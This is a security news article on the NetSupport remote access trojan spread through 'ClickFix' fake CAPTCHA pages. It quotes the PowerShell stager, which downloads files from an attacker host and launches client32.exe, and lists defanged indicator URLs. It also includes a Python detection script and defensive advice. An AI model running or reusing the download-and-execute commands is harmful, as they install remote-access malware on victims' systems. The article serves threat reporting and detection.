Security researchers have observed a marked surge in the use of the NetSupport Remote Access Trojan (RAT). The tool gives attackers complete control over compromised systems.
The increase in activity is tied to the “ClickFix” Initial Access Vector (IAV), a social-engineering technique that tricks users into running malicious PowerShell commands themselves.
Originally released in 1989 as a legitimate remote IT support tool, NetSupport has been repurposed by cybercriminals to monitor screens, control keyboards and mice, transfer files, and execute commands.
Left undetected, an infection can lead to ransomware deployment, data breaches, and disruption of business operations.
The ClickFix technique plants fake CAPTCHA pages on compromised websites that instruct users to copy a PowerShell command and run it.
That command downloads and installs the NetSupport RAT client and establishes Command-and-Control (C2) connections to gateways operated by the attacker.
data:image/s3,"s3://crabby-images/4b554/4b554b5ad52666a3ff829ea1f45b4aa5e46d103f" alt="".webp)
According to eSentire analysts, the RAT payloads are frequently hosted at URLs with “.png” in the path, and the C2 gateway URLs often contain “fakeurl.htm”.
data:image/s3,"s3://crabby-images/3e5a3/3e5a368c4bdae19ac0707b9294eee07620ef0c7f" alt="".webp)
Analysis of the Attack
The PowerShell script used in ClickFix attacks typically consists of the following stages:
- Creation of a random folder:

```powershell
$randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | ForEach-Object {[char]$_})
$randomFolderPath = Join-Path -Path $env:APPDATA -ChildPath $randomFolderName
New-Item -ItemType Directory -Path $randomFolderPath
```

- Retrieval of RAT components:

```powershell
$url = "http://fbinter.com/a/1.png"
$file = $randomFolderPath + "client32.ini"
Invoke-WebRequest $url -OutFile $file
```

Similar commands are used to fetch the other components, such as client32.exe and the setup files.

- Execution of the RAT:

```powershell
$file12 = $randomFolderPath + "client32.exe"
Start-Process $file12
```
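The stager pattern and the URL conventions described above translate directly into hunting logic. The script below is an added example, not code from the article or from eSentire; the log line format and the `.invalid` hostnames are constructed for the demonstration. It checks PowerShell script-block text for the download, random-folder and Start-Process combination; process starts of client32.exe from %APPDATA% (the quoted script joins the folder path and file name without a separator, so the files can also land directly in %APPDATA% with the six-letter random prefix, which the regex covers); and web requests whose “.png” path returns a non-image content type or whose path contains fakeurl.htm.

```python
import re
from typing import List, Tuple
from urllib.parse import urlparse

# Constructed sample telemetry (not from the article). Each line is
# "<source>|<fields>" where source is one of:
#   scriptblock|<PowerShell script text>            (PowerShell script block logging)
#   process|<image path>|<parent image name>        (process creation telemetry)
#   web|<requested URL>|<response Content-Type>      (web proxy log)
# Hostnames use the reserved .invalid TLD; they are placeholders, not real IoCs.
SAMPLE_EVENTS = [
    "scriptblock|$randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 "
    "| ForEach-Object {[char]$_}); $url = 'http://stage.example.invalid/a/1.png'; "
    "Invoke-WebRequest $url -OutFile $file; Start-Process $file12",
    "scriptblock|Get-ChildItem C:\\Temp | Where-Object { $_.Length -gt 1MB }",
    "process|C:\\Users\\alice\\AppData\\Roaming\\Kqzwvb\\client32.exe|powershell.exe",
    "process|C:\\Users\\alice\\AppData\\Roaming\\Kqzwvbclient32.exe|powershell.exe",
    "process|C:\\Program Files\\NetSupport\\NetSupport Manager\\client32.exe|services.exe",
    "web|http://stage.example.invalid/a/2.png|application/octet-stream",
    "web|http://cdn.example.invalid/img/logo.png|image/png",
    "web|http://gateway.example.invalid/fakeurl.htm|text/html",
]

# Stage markers of the ClickFix stager: a random directory name built from
# Get-Random/[char], a download primitive, and a Start-Process launch.
PS_RANDOM_DIR = re.compile(r"Get-Random\s+-Count\s+\d+.*?\[char\]", re.I | re.S)
PS_DOWNLOAD = re.compile(r"\b(Invoke-WebRequest|iwr|DownloadFile|DownloadString)\b", re.I)
PS_LAUNCH = re.compile(r"\bStart-Process\b", re.I)

# client32.exe under %APPDATA%\Roaming, either inside a six-letter random folder
# or (because the stager concatenates without a separator) as a file whose name
# carries the six-letter prefix directly.
APPDATA_CLIENT32 = re.compile(r"\\AppData\\Roaming\\[A-Za-z]{6}\\?client32\.exe$", re.I)


def check_scriptblock(script: str) -> List[str]:
    """Flag a script block that downloads a file and either builds a random
    directory name or launches what it fetched (the ClickFix stager shape)."""
    if PS_DOWNLOAD.search(script) and (PS_RANDOM_DIR.search(script) or PS_LAUNCH.search(script)):
        return ["clickfix_powershell_stager"]
    return []


def check_process(image: str) -> List[str]:
    """Flag NetSupport's client32.exe running from a random %APPDATA% location;
    a legitimate product install runs it from Program Files instead."""
    if APPDATA_CLIENT32.search(image):
        return ["netsupport_client32_in_appdata"]
    return []


def check_web(url: str, content_type: str) -> List[str]:
    """Flag a '.png' URL that does not return an image (payload masquerading as
    an image) and the 'fakeurl.htm' C2 gateway path reported by eSentire."""
    path = urlparse(url).path.lower()
    hits: List[str] = []
    if path.endswith(".png") and not content_type.lower().startswith("image/"):
        hits.append("png_path_non_image_content")
    if "fakeurl.htm" in path:
        hits.append("netsupport_c2_gateway_url")
    return hits


def detect(events: List[str]) -> List[Tuple[str, str]]:
    """Run every event through the check for its source; return (rule, evidence) pairs."""
    findings: List[Tuple[str, str]] = []
    for line in events:
        source, _, rest = line.partition("|")
        if source == "scriptblock":
            rules = check_scriptblock(rest)
        elif source == "process":
            image, _, _parent = rest.partition("|")
            rules = check_process(image)
        elif source == "web":
            url, _, content_type = rest.partition("|")
            rules = check_web(url, content_type)
        else:
            rules = []
        findings.extend((rule, line) for rule in rules)
    return findings


if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule:32} {evidence[:90]}")
```

The script-block rule requires a download primitive plus one of the other two markers rather than any single keyword, which keeps ordinary administrative PowerShell (the second sample line) out of the results; the web rule relies on the response Content-Type, so it needs proxy logs that record it.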
data:image/s3,"s3://crabby-images/651f5/651f547a6723b7845a9f26012b337e6091f8d623" alt="".webp)
To defend against NetSupport RAT and ClickFix attacks, organizations should deploy Endpoint Detection and Response (EDR) agents on all corporate assets and run security awareness training so staff recognize emerging lures such as ClickFix.
Restricting user privileges also helps prevent unauthorized software installations.
Organizations should further harden endpoints by disabling the Run command and restricting WScript.exe and Mshta.exe through Group Policy Objects (GPO) or Windows Defender Application Control (WDAC).
Staying current with the latest IOCs and enforcing strong security controls remains essential to defending against these threats.
Indicators of Compromise (IOCs)
- ClickFix Web Pages:
- hxxp[://]eveverify[.]com/captcha[.]html
- hxxps[://]eiesoft[.]com/Ray-verify[.]html
- Delivery of NetSupport RAT Payload:
- hxxp[://]fbinter[.]com/a/1[.]png
- hxxp[://]fbinter[.]com/a/2[.]png
- hxxp[://]fbinter[.]com/a/3[.]png
The post NetSupport RAT Grant Attackers Full Access To Victims Systems appeared first on Cyber Security News.